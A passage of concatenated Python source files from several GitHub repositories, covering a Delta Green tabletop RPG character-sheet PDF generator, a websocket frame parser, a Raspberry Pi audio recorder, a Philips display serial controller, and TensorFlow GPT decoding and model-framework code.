"weapon0_range": (215, 480, 11),
"weapon0_damage": (270, 480, 11),
"weapon0_ap": (345, 480, 11),
"weapon0_lethality": (410, 480, 11),
"weapon0_kill_radius": (462, 480, 11),
"weapon0_ammo": (525, 480, 11),
"weapon0_note": (560, 480, 11),
"weapon1": (85, 461, 11),
"weapon1_roll": (175, 461, 11),
"weapon1_range": (215, 461, 11),
"weapon1_damage": (270, 461, 11),
"weapon1_ap": (345, 461, 11),
"weapon1_lethality": (410, 461, 11),
"weapon1_kill_radius": (462, 461, 11),
"weapon1_ammo": (525, 461, 11),
"weapon1_note": (560, 461, 11),
"weapon2": (85, 442, 11),
"weapon2_roll": (175, 442, 11),
"weapon2_range": (215, 442, 11),
"weapon2_damage": (270, 442, 11),
"weapon2_ap": (345, 442, 11),
"weapon2_lethality": (410, 442, 11),
"weapon2_kill_radius": (462, 442, 11),
"weapon2_ammo": (525, 442, 11),
"weapon2_note": (560, 442, 11),
"weapon3": (85, 423, 11),
"weapon3_roll": (175, 423, 11),
"weapon3_range": (215, 423, 11),
"weapon3_damage": (270, 423, 11),
"weapon3_ap": (345, 423, 11),
"weapon3_lethality": (410, 423, 11),
"weapon3_kill_radius": (462, 423, 11),
"weapon3_ammo": (525, 423, 11),
"weapon3_note": (560, 423, 11),
"weapon4": (85, 404, 11),
"weapon4_roll": (175, 404, 11),
"weapon4_range": (215, 404, 11),
"weapon4_damage": (270, 404, 11),
"weapon4_ap": (345, 404, 11),
"weapon4_lethality": (410, 404, 11),
"weapon4_kill_radius": (462, 404, 11),
"weapon4_ammo": (525, 404, 11),
"weapon4_note": (560, 404, 11),
"weapon5": (85, 385, 11),
"weapon5_roll": (175, 385, 11),
"weapon5_range": (215, 385, 11),
"weapon5_damage": (270, 385, 11),
"weapon5_ap": (345, 385, 11),
"weapon5_lethality": (410, 385, 11),
"weapon5_kill_radius": (462, 385, 11),
"weapon5_ammo": (525, 385, 11),
"weapon5_note": (560, 385, 11),
"weapon6": (85, 366, 11),
"weapon6_roll": (175, 366, 11),
"weapon6_range": (215, 366, 11),
"weapon6_damage": (270, 366, 11),
"weapon6_ap": (345, 366, 11),
"weapon6_lethality": (410, 366, 11),
"weapon6_kill_radius": (465, 366, 11),
"weapon6_ammo": (525, 366, 11),
"weapon6_note": (560, 366, 11),
"gear0": (75, 628, 8),
"gear1": (75, 618, 8),
"gear2": (75, 608, 8),
"gear3": (75, 598, 8),
"gear4": (75, 588, 8),
"gear5": (75, 578, 8),
"gear6": (75, 568, 8),
"gear7": (75, 558, 8),
"gear8": (75, 548, 8),
"gear9": (75, 538, 8),
"gear10": (75, 528, 8),
"gear11": (323, 628, 8),
"gear12": (323, 618, 8),
"gear13": (323, 608, 8),
"gear14": (323, 598, 8),
"gear15": (323, 588, 8),
"gear16": (323, 578, 8),
"gear17": (323, 568, 8),
"gear18": (323, 558, 8),
"gear19": (323, 548, 8),
"gear20": (323, 538, 8),
"gear21": (323, 528, 8),
"note0": (50, 40, 8),
"note1": (50, 30, 8),
"note2": (50, 20, 8),
"note3": (50, 10, 8),
"note4": (240, 40, 8),
"note5": (240, 30, 8),
"note6": (240, 20, 8),
"note7": (240, 10, 8),
"note8": (410, 40, 8),
"note9": (410, 30, 8),
"note10": (410, 20, 8),
"note11": (410, 10, 8),
}
# Fields that also get a multiplier
x5_stats = ["strength", "constitution", "dexterity", "intelligence", "power", "charisma"]
def __init__(self, filename, professions, pages_per_sheet=1):
self.filename = filename
self.pages_per_sheet = pages_per_sheet
self.c = canvas.Canvas(self.filename)
# Set US Letter in points
self.c.setPageSize((612, 792))
self.c.setAuthor("https://github.com/jimstorch/DGGen")
self.c.setTitle("Delta Green Agent Roster")
self.c.setSubject("Pre-generated characters for the Delta Green RPG")
# Register Custom Fonts
pdfmetrics.registerFont(TTFont("Special Elite", "data/SpecialElite.ttf"))
pdfmetrics.registerFont(TTFont("OCRA", "data/OCRA.ttf"))
if len(professions) > 1:
self.generate_toc(professions, pages_per_sheet)
def generate_toc(self, professions, pages_per_sheet):
"""Build a clickable Table of Contents on page 1"""
self.bookmark("Table of Contents")
self.c.setFillColorRGB(0, 0, 0)
self.c.setFont("OCRA", 10)
now = datetime.datetime.utcnow().isoformat() + "Z"
self.c.drawString(150, 712, "DGGEN DTG " + now)
self.c.drawString(150, 700, "CLASSIFIED/DG/NTK//")
self.c.drawString(150, 688, "SUBJ ROSTER/ACTIVE/NOCELL/CONUS//")
top = 650
pagenum = 2
for count, profession in enumerate(professions):
label = generate_label(profession)
chapter = "{:.<40}".format(shorten(label, 37, placeholder="")) + "{:.>4}".format(
pagenum
)
self.c.drawString(150, top - self.line_drop(count), chapter)
self.c.linkAbsolute(
label,
label,
(145, (top - 6) - self.line_drop(count), 470, (top + 18) - self.line_drop(count)),
)
pagenum += profession["number_to_generate"] * pages_per_sheet
if pages_per_sheet == 1:
chapter = "{:.<40}".format("Blank Character Sheet Second Page") + "{:.>4}".format(
pagenum + profession["number_to_generate"]
)
self.c.drawString(150, top - self.line_drop(pagenum), chapter)
self.c.linkAbsolute(
"Back Page",
"Back Page",
(
145,
(top - 6) - self.line_drop(pagenum),
470,
(top + 18) - self.line_drop(pagenum),
),
)
self.c.showPage()
@staticmethod
def line_drop(count, linesize=22):
return count * linesize
def bookmark(self, text):
self.c.bookmarkPage(text)
self.c.addOutlineEntry(text, text)
def draw_string(self, x, y, size, text):
self.c.setFont(DEFAULT_FONT, size)
self.c.setFillColorRGB(*TEXT_COLOR)
self.c.drawString(x, y, str(text))
def fill_field(self, field, value):
try:
x, y, s = self.field_xys[field]
self.draw_string(x, y, s, str(value))
except KeyError:
logger.error("Unknown field %s", field)
def add_page(self, d):
# Add background. ReportLab will cache it for repeat
self.c.drawImage("data/Character Sheet NO BACKGROUND FRONT.jpg", 0, 0, 612, 792)
for key in d:
self.fill_field(key, d[key])
# Tell ReportLab we're done with current page
self.c.showPage()
def add_page_2(self, e):
# Add background. ReportLab will cache it for repeat
self.c.drawImage("data/Character Sheet NO BACKGROUND BACK.jpg", 0, 0, 612, 792)
for key in e:
self.fill_field(key, e[key])
# Tell ReportLab we're done with current page
self.c.showPage()
def save_pdf(self):
if self.pages_per_sheet == 1:
self.bookmark("Back Page")
self.c.drawImage("data/Character Sheet NO BACKGROUND BACK.jpg", 0, 0, 612, 792)
self.c.showPage()
self.c.save()
def generate_label(profession):
return ", ".join(
e
for e in [
profession.get("label", ""),
profession.get("employer", ""),
profession.get("division", ""),
]
if e
)
def get_options():
"""Get options and arguments from argv string."""
parser = argparse.ArgumentParser(description=description)
parser.add_argument(
"-v",
"--verbosity",
action="count",
default=0,
help="specify up to three times to increase verbosity, "
"i.e. -v to see warnings, -vv for information messages, or -vvv for debug messages.",
)
parser.add_argument("-V", "--version", action="version", version=__version__)
parser.add_argument(
"-o",
"--output",
action="store",
default=f"DeltaGreenPregen-{datetime.datetime.now() :%Y-%m-%d-%H-%M}.pdf",
help="Output PDF file. Defaults to %(default)s.",
)
parser.add_argument(
"-t", "--type", action="store", help=f"Select single profession to generate."
)
parser.add_argument("-l", "--label", action="store", help="Override profession label.")
parser.add_argument(
"-c",
"--count",
type=int,
action="store",
help="Generate this many characters of each profession.",
)
parser.add_argument(
"-e", "--employer", action="store", help="Set employer for all generated characters."
)
parser.add_argument(
"-u",
"--unequipped",
action="store_false",
dest="equip",
help="Don't generate equipment.",
default=True,
)
data = parser.add_argument_group(title="Data", description="Data file locations")
data.add_argument(
"--professions",
action="store",
default="data/professions.json",
help="Data file for professions - defaults to %(default)s",
)
return parser.parse_args()
@dataclass
class Data:
male_given_names: List[str]
female_given_names: List[str]
family_names: List[str]
towns: List[str]
professions: Dict[str, Any]
kits: Dict[str, Any]
weapons: Dict[str, Any]
armour: Dict[str, Any]
distinguishing: Dict[Tuple[str, int], List[str]]
def load_data(options):
with open("data/boys1986.txt") as f:
male_given_names = f.read().splitlines()
with open("data/girls1986.txt") as f:
female_given_names = f.read().splitlines()
with open("data/surnames.txt") as f:
family_names = f.read().splitlines()
with open("data/towns.txt") as f:
towns = f.read().splitlines()
with open(options.professions) as f:
professions = json.load(f)
with open("data/equipment.json") as f:
equipment = json.load(f)
kits = equipment["kits"]
weapons = equipment["weapons"]
armour = equipment["armour"]
distinguishing = {}
with open("data/distinguishing-features.csv") as f:
for row in csv.DictReader(f):
for value in range(int(row["from"]), int(row["to"]) + 1):
distinguishing.setdefault((row["statistic"], value), []).append(
row["distinguishing"]
)
data = Data(
male_given_names=male_given_names,
female_given_names=female_given_names,
family_names=family_names,
towns=towns,
professions=professions,
kits=kits,
weapons=weapons,
armour=armour,
distinguishing=distinguishing,
)
return data
def init_logger(verbosity, stream=sys.stdout):
"""Initialize logger and warnings according to verbosity argument.
Verbosity levels of 0-3 supported."""
is_not_debug = verbosity <= 2
level = (
[logging.ERROR, logging.WARNING, logging.INFO][verbosity] if is_not_debug else logging.DEBUG
)
log_format = (
"%(message)s"
if is_not_debug
else "%(asctime)s %(levelname)-8s %(name)s %(module)s.py:%(funcName)s():%(lineno)d %(message)s"
)
logging.basicConfig(level=level, format=log_format, stream=stream)
if is_not_debug:
warnings.filterwarnings("ignore")
if __name__ == "__main__":
sys.exit(main())
``` |
{
"source": "jimstorch/netboa",
"score": 2
} |
#### File: netboa/websocket/ws_client.py
```python
import struct
import array
from netboa import verbosity
from netboa import str_to_bytes
from netboa import bytes_to_str
from netboa.client import Client
from netboa.websocket.ws_error import NetboaWsBadFrame
from netboa.websocket.ws_error import NetboaWsCloseFrame
def unpack_frame(data):
size = len(data)
if size < 1:
raise NetboaWsBadFrame('[WS13] empty frame.')
#if l <
byte1, byte2 = struct.unpack_from('!BB', data)
if not (byte1 >> 7) & 1:
raise NetboaWsBadFrame('[WS13] final bit not set.')
opcode = byte1 & 0xf
## Firefox sends a close-frame opcode when you close the page
if opcode & 0x8:
raise NetboaWsCloseFrame('[WS13] close-frame opcode received.')
if not opcode & 0x1:
raise NetboaWsBadFrame('[WS13] not text frame.')
masked = (byte2 >> 7) & 1
mask_offset = 4 if masked else 0
payload_hint = byte2 & 0x7f
if payload_hint < 126:
payload_offset = 2
payload_length = payload_hint
elif payload_hint == 126:
payload_offset = 4
if size < 4:
raise NetboaWsBadFrame('[WS13] too short for 16b payload length.')
payload_length = struct.unpack_from('!H',data,2)[0]
elif payload_hint == 127:
payload_offset = 8
if size < 8:
raise NetboaWsBadFrame('[WS13] too short for 64b payload length.')
payload_length = struct.unpack_from('!Q',data,2)[0]
payload = array.array('B')
payload.fromstring(data[payload_offset + mask_offset:])
if len(payload) != payload_length:
raise NetboaWsBadFrame('[WS13] malformed payload length.')
if masked:
if size < (payload_offset + 4):
raise NetboaWsBadFrame('[WS13] frame too short for mask.')
mask_bytes = struct.unpack_from('!BBBB',data,payload_offset)
for i in range(len(payload)):
payload[i] ^= mask_bytes[i % 4]
return payload.tostring()
def pack_frame(payload):
header = b'\x81' # Final Frame Flag & Text Frame Op Code
size = len(payload)
if size < 126:
header += struct.pack('!B', size)
elif size < 2**16:
header += struct.pack('!BH', 126, size)
elif size < 2**64:
header += struct.pack('!BQ', 127, size)
else:
raise BaseException('[WS13] WTF are you trying to send?')
return header + payload
class WsClient(Client):
def __init__(self, sock, address, port):
Client.__init__(self, sock, address, port)
def get_string(self):
data = bytes_to_str(self.get_bytes())
try:
payload = unpack_frame(data)
except NetboaWsCloseFrame as error:
payload = ''
self.server.vprint('[WebSocket] %s' % error, verbosity.INFO)
self.deactivate()
except NetboaWsBadFrame as error:
payload = ''
self.server.vprint('[WebSocket Error] %s' % error, verbosity.ERROR)
self.deactivate()
return payload
def send(self, data):
frame = pack_frame(data)
self.send_raw(frame)
def send_raw(self, data):
if type(data) == str:
self.send_buffer += str_to_bytes(data)
else:
self.send_buffer += data
self.server._request_send(self)
``` |
{
"source": "jimstorch/pi_conference_recorder",
"score": 3
} |
#### File: jimstorch/pi_conference_recorder/record_pi.py
```python
import os
import sys
import time
from datetime import datetime
import alsaaudio
import solame as lame
from gpiozero import LED
from gpiozero import Button
USAGE = """
Usage: record.py [OPTION]...
-d, --device Specify the capture device.
-h, --help Print this message and exit.
-l, --list List capture devices and exit.
-p, --path Set the path to save MP3's to.
-r, --rate Specify the capture devices rate; 44100, 48000, etc.
"""
MAX_RECORD_TIME = 60 * 60 * 3 # Three hours worth of seconds
# Button Blink Status Codes
GOOD = 1
FILE_PATH_ERROR = 2
DEVICE_OPEN_ERROR = 3
STREAM_OPEN_ERROR = 4
FILE_WRITE_ERROR = 5
BUFFER_OVERFLOW = 6
# Set up our GPIO
LED_GPIO = 18
BUTTON_GPIO = 24
led = LED(LED_GPIO)
led.off()
# Global for state control, True = recording
_RECORDING_STATE = False
def toggle_recording_state():
"""
Callback function for gpiozero lib's Button.when_pressed property.
Used to toggle whether we're in recording mode or not and to set the button LED state
"""
global _RECORDING_STATE
_RECORDING_STATE = not _RECORDING_STATE
#led.value = _RECORDING_STATE
print('recording_state', _RECORDING_STATE)
if _RECORDING_STATE:
led.blink(1,.5)
else:
led.off()
def led_blink(blinks):
"""
Blink the record button light a series of times to indicate a status.
"""
for _ in range(blinks):
led.on()
time.sleep(.5)
led.off()
time.sleep(.5)
def datestamp():
"""
Give us a unique, sortable date-based file prefix in the format of '2019-12-31_2359.1234' .
"""
return(datetime.now().strftime("%Y-%m-%d_%H%M.%S"))
"""
List audio devices and exit.
"""
for index, arg in enumerate(sys.argv):
if arg in ['--list', '-l']:
devices = alsaaudio.pcms(alsaaudio.PCM_CAPTURE)
print("Listing audio capture hardware:")
for device in devices:
print('\t', device)
exit()
for index, arg in enumerate(sys.argv):
if arg in ['--help', '-h']:
print(USAGE)
exit()
# ok for onboard audio but for USB audio devices you'll probably need to specify it.
ALSA_DEVICE = 'default'
# TASCAM US 4x4 = plughw:CARD=US4x4,DEV=0
# Blue Yeti = plughw:CARD=Microphone,DEV=0
for index, arg in enumerate(sys.argv):
if arg in ['--device', '-d'] and len(sys.argv) > index + 1:
ALSA_DEVICE = sys.argv[index + 1]
del sys.argv[index]
del sys.argv[index]
break
RATE = 44100 # Match the hardware rate or there will be trouble. Blue Yeti = 48000
for index, arg in enumerate(sys.argv):
if arg in ['--rate', '-r'] and len(sys.argv) > index + 1:
RATE = int(sys.argv[index + 1])
del sys.argv[index]
del sys.argv[index]
break
RECORDING_PATH = "."
for index, arg in enumerate(sys.argv):
if arg in ['--path', '-p'] and len(sys.argv) > index + 1:
RECORDING_PATH = sys.argv[index + 1]
del sys.argv[index]
del sys.argv[index]
break
if len(sys.argv) != 1:
print(USAGE)
exit()
if __name__ == "__main__":
if not os.path.isdir(RECORDING_PATH):
print('Recording path "%s" not accessible.' % RECORDING_PATH)
led_blink(FILE_PATH_ERROR)
quit()
# Set the button callback
button = Button(BUTTON_GPIO)
button.when_pressed = toggle_recording_state
# If we got this far, let's give an visual thumb's up
led_blink(GOOD)
# Configure Lame Encoder
# It will stay open for the duration of the program
lame.set_sample_rate(RATE)
lame.set_num_channels(1)
lame.set_mode(lame.MONO)
lame.set_bit_rate(32)
lame.init_parameters()
while True:
if _RECORDING_STATE:
# Create pyAlsaAudio stream, settings
capture = alsaaudio.PCM(
alsaaudio.PCM_CAPTURE, alsaaudio.PCM_NONBLOCK, device=ALSA_DEVICE)
capture.setchannels(1)
capture.setrate(RATE)
capture.setformat(alsaaudio.PCM_FORMAT_S16_LE)
capture.setperiodsize(160)
# Open a file descriptor for writing
mp3filename = os.path.join(RECORDING_PATH, '%s.mp3' % datestamp())
mp3file = open(mp3filename, 'wb')
start_time = time.time()
print('--> Recording %s started.' % mp3filename)
while _RECORDING_STATE:
# Grab some PCM data from the input device
l, pcm = capture.read()
if l:
mp3_data = lame.encode_buffer(pcm)
mp3file.write(mp3_data)
# Have we been going too long?
if time.time() - start_time >= MAX_RECORD_TIME:
toggle_recording_state()
# Finish the MP3 encoding
capture.close()
mp3_data = lame.encode_flush()
if len(mp3_data):
mp3file.write(mp3_data)
mp3file.close()
print('--> %s finished.' % mp3filename)
``` |
{
"source": "jimstorch/pySICP",
"score": 3
} |
#### File: jimstorch/pySICP/on.py
```python
import serial
"""
Control Philips Digital Signage via the serial port.
Requires pyserial:
pip3 install pyserial
This is an older device that uses SICP v1.7 (no Group byte)
Note that you may need to add yourself to the 'dialout' group in Linux.
"""
DEVICE = '/dev/ttyUSB0'
MONITOR = 0x01
SET_POWER_STATE = 0x18
PWR_OFF = 0x01
PWR_ON = 0x02
with serial.Serial() as ser:
ser.baudrate = 9600
ser.port = DEVICE
ser.open()
ser.timeout = .25
#print(ser)
def checksum(data):
# Calculate checksum by Exclusive Or'ing each byte
c = data[0]
for b in data[1:]:
c ^= b
return c
def checksum_write(data):
packet = bytearray()
# First byte is the packet length
# to which we add one byte for leading length byte itself
# and another for the trailing checksum byte
packet.append(len(data) + 2)
packet.extend(data)
packet.append(checksum(packet))
print('Sending packet ', packet)
ser.write(packet)
cmd = [MONITOR, SET_POWER_STATE, PWR_ON]
checksum_write(cmd)
resp = ser.read(40)
#print(resp)
if resp == b'\x05\x01\x00\x06\x02':
print('CMD OK')
else:
print('Bad response ', resp)
``` |
{
"source": "jimsxchen/genlogger",
"score": 3
} |
#### File: genlogger/test/test.py
```python
import logging
from jlogger import j_logger
import unittest
class TestRotatingFileLog(unittest.TestCase):
def setUp(self):
j_logger.set_logger("rotate_logger_unittest.log", max_size=2048)
self.logger=logging.getLogger(__name__)
def test_wrap(self):
assert self.logger.hasHandlers()
for i in range(200):
self.logger.info(f"Testing wrap and rotate. {i} ")
def test_formatter_change(self):
self.logger.info(f"Test test_formatter_change starts.")
fmtter = self.logger.root.handlers[0].formatter
new_fmtter = logging.Formatter("%(asctime)s — myname — %(funcName)s:%(lineno)d — %(levelname)s — %(message)s")
self.logger.root.handlers[0].setFormatter(new_fmtter)
self.logger.info(f"after changing formatter.")
self.logger.root.handlers[0].setFormatter(fmtter)
self.logger.info(f"restore formatter.")
if __name__ == '__main__':
unittest.main()
``` |
{
"source": "jimth001/formality_emnlp19",
"score": 4
} |
#### File: evaluate/tokenizer/tokenizer.py
```python
import nltk
def file_tokenize(input,output):
with open(input,'r',encoding='utf-8') as f:
with open(output,'w',encoding='utf-8') as fw:
for line in f:
fw.write(' '.join(nltk.word_tokenize(line.strip()))+'\n')
```
#### File: gpt/src/sample.py
```python
import tensorflow as tf
from gpt.src import model
def top_k_logits(logits, k):
if k == 0:
# no truncation
return logits
def _top_k():
values, _ = tf.nn.top_k(logits, k=k)
min_values = values[:, -1, tf.newaxis]
return tf.where(
logits < min_values,
tf.ones_like(logits, dtype=logits.dtype) * -1e10,
logits,
)
return tf.cond(
tf.equal(k, 0),
lambda: logits,
lambda: _top_k(),
)
def sample_sequence(*, hparams, length, start_token=None, batch_size=None, context=None, temperature=1, top_k=0):
if start_token is None:
assert context is not None, 'Specify exactly one of start_token and context!'
else:
assert context is None, 'Specify exactly one of start_token and context!'
context = tf.fill([batch_size, 1], start_token)
def step(hparams, tokens, past=None):
lm_output = model.model(hparams=hparams, X=tokens, past=past, reuse=tf.AUTO_REUSE)
logits = lm_output['logits'][:, :, :hparams.n_vocab]
presents = lm_output['present']
presents.set_shape(model.past_shape(hparams=hparams, batch_size=batch_size))
return {
'logits': logits,
'presents': presents,
}
with tf.name_scope('sample_sequence'):
# Don't feed the last context token -- leave that to the loop below
# TODO: Would be slightly faster if we called step on the entire context,
# rather than leaving the last token transformer calculation to the while loop.
context_output = step(hparams, context[:, :-1])
def body(past, prev, output, all_logits):
next_outputs = step(hparams, prev[:, tf.newaxis], past=past)
logits = next_outputs['logits'][:, -1, :] / tf.to_float(temperature)
logits = top_k_logits(logits, k=top_k)
samples = tf.multinomial(logits, num_samples=1, output_dtype=tf.int32)
return [
tf.concat([past, next_outputs['presents']], axis=-2),
tf.squeeze(samples, axis=[1]),
tf.concat([output, samples], axis=1),
tf.concat([all_logits,next_outputs['logits']],axis=1)
]
def cond(*args):
return True
_, _, tokens,all_logits = tf.while_loop(
cond=cond, body=body,
maximum_iterations=length,
loop_vars=[
context_output['presents'],
context[:, -1],
context,
context_output['logits']
],
shape_invariants=[
tf.TensorShape(model.past_shape(hparams=hparams, batch_size=batch_size)),
tf.TensorShape([batch_size]),
tf.TensorShape([batch_size, None]),
tf.TensorShape([batch_size, None, None]),
],
back_prop=False,
)
return tokens
``` |
{
"source": "jimth001/my-tf-framework-for-nlp-tasks",
"score": 2
} |
#### File: my-tf-framework-for-nlp-tasks/DeepComponents/GPTDecoder.py
```python
import tensorflow as tf
from DeepComponents.TransformerBlock import block, positions_for,norm, shape_list
from DeepComponents.common_ops import gather_2d, tile_to_beam_size, merge_first_two_dims
class Decoder():
def __init__(self,scope,hparams):
self.scope = scope
self.hparams = hparams
with tf.variable_scope(scope):
with tf.variable_scope('model', reuse=tf.AUTO_REUSE):
self.wpe=tf.get_variable('wpe', [self.hparams.n_ctx, self.hparams.n_embd],
initializer=tf.random_normal_initializer(stddev=0.01))
self.wte = tf.get_variable('wte', [self.hparams.n_vocab, self.hparams.n_embd],
initializer=tf.random_normal_initializer(stddev=0.02))
self.attn_w = tf.get_variable(shape=(self.hparams.n_embd, self.hparams.n_embd), name='sen_attn_w')
def decode_all(self,tokens,past_list,enc_h_list):
"""for multiple sources, like GPT-HA, if len(past_list)==1, it is a simple GPTEncoder-Decoder model"""
with tf.variable_scope(self.scope,reuse=tf.AUTO_REUSE):
with tf.variable_scope('model',reuse=tf.AUTO_REUSE):
results = {}
if type(past_list)!=list:
past_list=[past_list]
batch, sequence = shape_list(tokens)
#past_length = 0
all_past_length=[0 if past_list[0] is None else tf.shape(past_list[0])[-2]]
past_length = tf.reduce_max(tf.stack(all_past_length,axis=0),axis=0)
h = tf.gather(self.wte, tokens) + tf.gather(self.wpe, positions_for(tokens, past_length))
values_present = {}
for i in range(0, self.hparams.n_layer):
querys = h
values_h = []
for j in range(0, len(past_list)):
past = past_list[j]
pasts = tf.unstack(past, axis=1) if past is not None else [None] * self.hparams.n_layer
assert len(pasts) == self.hparams.n_layer
h, present = block(querys, 'h%d' % i, past=pasts[i], hparams=self.hparams)
values_h.append(h)
if j in values_present:
values_present[j].append(present)
else:
values_present[j]=[present]
enc_h_all = tf.concat(enc_h_list, axis=1)
attn_score = tf.tensordot(querys, self.attn_w, axes=(2, 0))
attn_score = tf.matmul(attn_score, tf.transpose(enc_h_all, perm=(0, 2, 1))) # batch*seq*context_num
attn_score = tf.nn.softmax(attn_score,axis=2)
val_h_cat = tf.stack(values_h, axis=2)
val_h_cat = tf.expand_dims(attn_score, axis=3) * val_h_cat
val_h_cat = tf.reduce_sum(val_h_cat, axis=2)
h = val_h_cat
for j in range(0,len(past_list)):
values_present[j]=tf.stack(values_present[j],axis=1)
past_list[j]=tf.concat([past_list[j],values_present[j]],axis=-2)
h = norm(h, 'ln_f')
# Language model loss. Do tokens <n predict token n?
h_flat = tf.reshape(h, [batch * sequence, self.hparams.n_embd])
logits = tf.matmul(h_flat, self.wte, transpose_b=True)
logits = tf.reshape(logits, [batch, sequence, self.hparams.n_vocab])
results['logits'] = logits
return results
def sef_var_for_beam_search(self,enc_0_len,enc_h_list,beam_size):
self.enc_0_len=enc_0_len
self.enc_h_list=enc_h_list
self.enc_h_all = tf.concat(self.enc_h_list, axis=1)
self.enc_h_all=merge_first_two_dims(tile_to_beam_size(self.enc_h_all,beam_size=beam_size))
def decode_one_step(self,hparams:"no use, only for consistency of api", input_token, past_dec:list):
with tf.variable_scope(self.scope, reuse=tf.AUTO_REUSE):
with tf.variable_scope('model', reuse=tf.AUTO_REUSE):
all_past_length = [0 if past_dec[j] is None else tf.shape(past_dec[j])[-2] for j in range(0,len(past_dec))]
past_length=tf.reduce_max(tf.stack(all_past_length,axis=0),axis=0)
h = tf.gather(self.wte, input_token) + tf.gather(self.wpe, positions_for(input_token, past_length))
results = {}
batch, sequence = shape_list(input_token)
values_present = {}
for i in range(0, self.hparams.n_layer):
querys = h
values_h = []
for j in range(0, len(past_dec)):
dec_pasts = tf.unstack(past_dec[j], axis=1) if past_dec[j] is not None else [None] * self.hparams.n_layer #
h, present = block(querys, 'h%d' % i,
past=dec_pasts[i],
hparams=self.hparams)
values_h.append(h)
if j in values_present:
values_present[j].append(present)
else:
values_present[j]=[present]
attn_score = tf.tensordot(querys, self.attn_w, axes=(2, 0))
attn_score = tf.matmul(attn_score, tf.transpose(self.enc_h_all, perm=(0, 2, 1))) # batch*seq*context_num
attn_score = tf.nn.softmax(attn_score, axis=2)
val_h_cat = tf.stack(values_h, axis=2)
val_h_cat = tf.expand_dims(attn_score, axis=3) * val_h_cat
val_h_cat = tf.reduce_sum(val_h_cat, axis=2)
h = val_h_cat
for j in range(0,len(past_dec)):
values_present[j]=tf.stack(values_present[j],axis=1)
past_dec[j]=tf.concat([past_dec[j],values_present[j]],axis=-2)
h = norm(h, 'ln_f')
# Language model loss. Do tokens <n predict token n?
h_flat = tf.reshape(h, [batch * sequence, self.hparams.n_embd])
logits = tf.matmul(h_flat, self.wte, transpose_b=True)
logits = tf.reshape(logits, [batch, sequence, self.hparams.n_vocab])
results['logits'] = logits
results['presents']= past_dec
return results
```
#### File: my-tf-framework-for-nlp-tasks/MyEstimator/ModelFn.py
```python
from abc import ABCMeta, abstractmethod
from tensorflow.python.util import nest
import tensorflow as tf
from collections import OrderedDict
from enum import Enum
import json
from typing import List, Dict, Any, Collection, NoReturn, Set, Union
class PlaceholderType(Enum):
Text = 1
TargetInt = 2
TargetFloat = 3
TextLength = 4
TextAttnMask = 5
TextTargMask = 6
BatchSize = 7
SpecialBatchInformation = 8
class PlaceholderMetaData():
def __init__(self, type: PlaceholderType, dtype, shape, from_file_name=None, Ref=None):
"""
:param type: source input type for this placeholder
:param dtype: dtype for tf.placeholder
:param shape: shape for tf.placeholder
:param from_file_name: source data file's name for this placeholder
There are two ways to load data:
1.Read data for each placeholder from each from_file_name.
2.Read all data from one tsv file. The first line of the tsv must be the names of corresponding placeholders.
:param Ref: if Ref is None, this placeholder will not depend on other placeholder, such as Text.
For TextLength placeholder which depend on a Text placeholder, its Ref value should be
the name of the Text placeholder.
"""
self.type = type
self.Ref = Ref
self.shape = shape
self.from_file_name = from_file_name
self.dtype = dtype
class ModelFn:
def __init__(self):
"""
A model could have n placeholders, m losses to optimize,
k losses to only watch, t predictions to output.
Every placeholder, loss, prediction should have a name.
Each loss requires x placeholders, which can be represented as {loss_name:[placeholder1,...]}.
Each prediction requires x placeholders, which can be represented as {loss_name:[placeholder1,...]}.
Different losses, predictions, optimize_ops may have conflicts so sometimes you can not running once to fetch all of them.
Although this is almost not to happen, we also provide a strategy to deal with it.
In eval stage, we apply an list named eval_steps to define how to eval all losses in n steps.
n=len(eval_steps)
eval_steps=[step1,step2,...stepn]
step_i is a list of losses
You can put conflict losses into different steps.
Notice that use more than 1 eval steps will cause additional computational overhead,
so you should use it only when necessary.
In training stage, similarly but differently, we also provide a "training_steps" list, where
training_steps=[batch_1_step,batch_2_step,...]
batch_1_step=[step1,step2,...]
step1=[loss1,...] ...
In training stage:
for one_batch_steps in training_steps:
produce one batch data
for losses in one_batch_steps:
split losses into can_be_optimized and only_watch
then train(can_be_optimized,data) and fetch(only_watch,data)
In prediction stage, there is a list named "predicting_steps", similar to "eval_steps".
In training stage, we create a train_op for each optimized loss.
In training steps, if a loss is in self.losses_groups, ModelWrapper will run the corresponding train_op
and fetch the loss value, otherwise ModelWrapper will only fetch the loss value to display.
"""
# initialized when create placeholders
self.placeholder_groups: Dict[int, Dict[str, tf.placeholder]] = OrderedDict()
# initialized when building training graph
self.losses_groups: Dict[int, Dict[str, any]] = OrderedDict()
# initialized when building training graph
self.losses_only_watch_groups: Dict[int, Dict[str, any]] = OrderedDict()
# initialized when building inference graph
# NOTICE that all prediction tensor should be batch first.
self.prediction_groups: Dict[int, Dict[str, any]] = OrderedDict()
# initialized when the object is constructed. self.init_check() can help to check some errors.
self.placeholder_requirement_for_losses: Dict[str, List[str]] = {}
self.placeholder_requirement_for_predictions: Dict[str, List[str]] = {}
self.placeholders_meta_data: Dict[str, PlaceholderMetaData] = {}
self.training_steps: List[List[List[str]]] = [] # [batch1=[ step1=loss1,step2=loss3,... ] ]
self.eval_steps: List[List[str]] = [] # [first_step=[loss1,loss3],second_step=[loss2]]
self.predicting_steps: List[List[str]] = [] # [first_step=[pred1,pred2],second_step=[pred3]]
self.config: Dict[str, Any] = {}
# self.batch_train_steps_pointer = 0
def check_after_init(self):
# check if there are obvious errors after init.
# check type and length
def check_type_and_len(var: Collection, var_type, least_elements: int):
assert var is not None, "var can not be None"
assert type(var) == var_type, "Wrong type, should be %s" % (str(var_type))
assert len(var) > least_elements, "%s must have more than %d elements" % (str(var_type), least_elements)
check_type_and_len(self.placeholders_meta_data, dict, 0)
check_type_and_len(self.placeholder_requirement_for_losses, dict, 0)
for k, v in self.placeholder_requirement_for_losses.items():
check_type_and_len(v, list, 0)
check_type_and_len(self.placeholder_requirement_for_predictions, dict, -1)
for k, v in self.placeholder_requirement_for_predictions.items():
check_type_and_len(v, list, 0)
check_type_and_len(self.config, dict, -1)
check_type_and_len(self.training_steps, list, 0)
for batch_training_steps in self.training_steps:
check_type_and_len(batch_training_steps, list, 0)
for one_step_losses in batch_training_steps:
check_type_and_len(one_step_losses, list, 0)
# all required placeholders exist:
required_placeholders_set = set()
for loss_name in self.placeholder_requirement_for_losses.keys():
required_placeholders_set = required_placeholders_set | set(
self.placeholder_requirement_for_losses[loss_name])
for pred_name in self.placeholder_requirement_for_predictions.keys():
required_placeholders_set = required_placeholders_set | set(
self.placeholder_requirement_for_predictions[pred_name])
exist_placeholders_1 = set([name for name in self.placeholders_meta_data.keys()])
